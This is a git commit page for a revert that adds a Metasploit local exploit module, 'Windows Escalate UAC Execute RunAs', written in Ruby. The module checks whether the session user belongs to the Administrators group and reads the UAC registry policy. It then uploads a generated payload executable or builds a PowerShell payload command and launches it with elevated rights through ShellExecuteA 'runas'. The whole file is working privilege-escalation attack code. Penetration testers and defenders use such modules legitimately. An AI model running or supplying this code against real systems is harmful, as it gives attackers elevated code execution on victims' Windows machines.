Revert "removed ask file, already in pull request 2551"

This reverts commit 5ceda7c042.
2013-12-09 14:31:43 -07:00 · 2013-12-09 14:31:43 -07:00 · 1d07b2bbfa
parent 5ceda7c042
commit 1d07b2bbfa
1 changed files with 126 additions and 0 deletions
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Exploit::Powershell
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Escalate UAC Execute RunAs',
+      'Description'   => %q{
+        This module will attempt to elevate execution level using
+        the ShellExecute undocumented RunAs flag to bypass low
+        UAC settings.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'mubix', # Original technique
+          'b00stfr3ak' # Added powershell option
+      ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [ [ 'Windows', {} ] ],
+      'DefaultTarget' => 0,
+      'References'    => [
+        [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
+      ],
+      'DisclosureDate'=> "Jan 3 2012",
+    ))
+
+    register_options([
+      OptString.new("FILENAME", [ false, "File name on disk"]),
+      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
+    ])
+
+  end
+
+  def check
+    session.readline
+    print_status('Checking admin status...')
+    whoami = session.sys.process.execute('cmd /c whoami /groups',
+                                         nil,
+                                         {'Hidden' => true, 'Channelized' => true}
+    )
+    cmdout = []
+    while(cmdoutput = whoami.channel.read)
+      cmdout << cmdoutput
+    end
+    if cmdout.size == 0
+      fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
+    else
+      isinadmins = cmdout.join.scan(/S-1-5-32-544/)
+      if isinadmins.size > 0
+        print_good('Part of Administrators group! Continuing...')
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_error('Not in admins group, cannot escalate with this module')
+        print_error('Exiting...')
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
+  def exploit
+    admin_check = check
+    if admin_check.join =~ /safe/
+      return Exploit::CheckCode::Safe
+    end
+    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
+    open_key = session.sys.registry.open_key(root_key, base_key)
+    lua_setting = open_key.query_value('EnableLUA')
+
+    if lua_setting.data == 1
+      print_status "UAC is Enabled, checking level..."
+    else
+      print_good "UAC is not enabled, no prompt for the user"
+    end
+
+    uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
+
+    case uac_level.data
+      when 2
+        print_status "UAC is set to 'Always Notify'"
+        print_status "The user will be prompted, wait for them to click 'Ok'"
+      when 5
+        print_debug "UAC is set to Default"
+        print_debug "The user will be prompted, wait for them to click 'Ok'"
+      when 0
+        print_good "UAC is not enabled, no prompt for the user"
+    end
+
+    #
+    # Generate payload and random names for upload
+    #
+    case datastore["TECHNIQUE"]
+      when "EXE"
+        exe_payload = generate_payload_exe
+        payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+        payload_path = datastore["PATH"] || expand_path("%TEMP%")
+        cmd_location = "#{payload_path}\\#{payload_filename}"
+        if datastore["UPLOAD"]
+          print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+          write_file(cmd_location, exe_payload)
+        else
+          #print_error("No Upload Path!")
+          fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
+          return
+        end
+        command, args = cmd_location,nil
+        session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+      when "PSH"
+        command, args = "cmd.exe",  " /c #{cmd_psh_payload(payload.encoded)}"
+    end
+    session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+  end
+end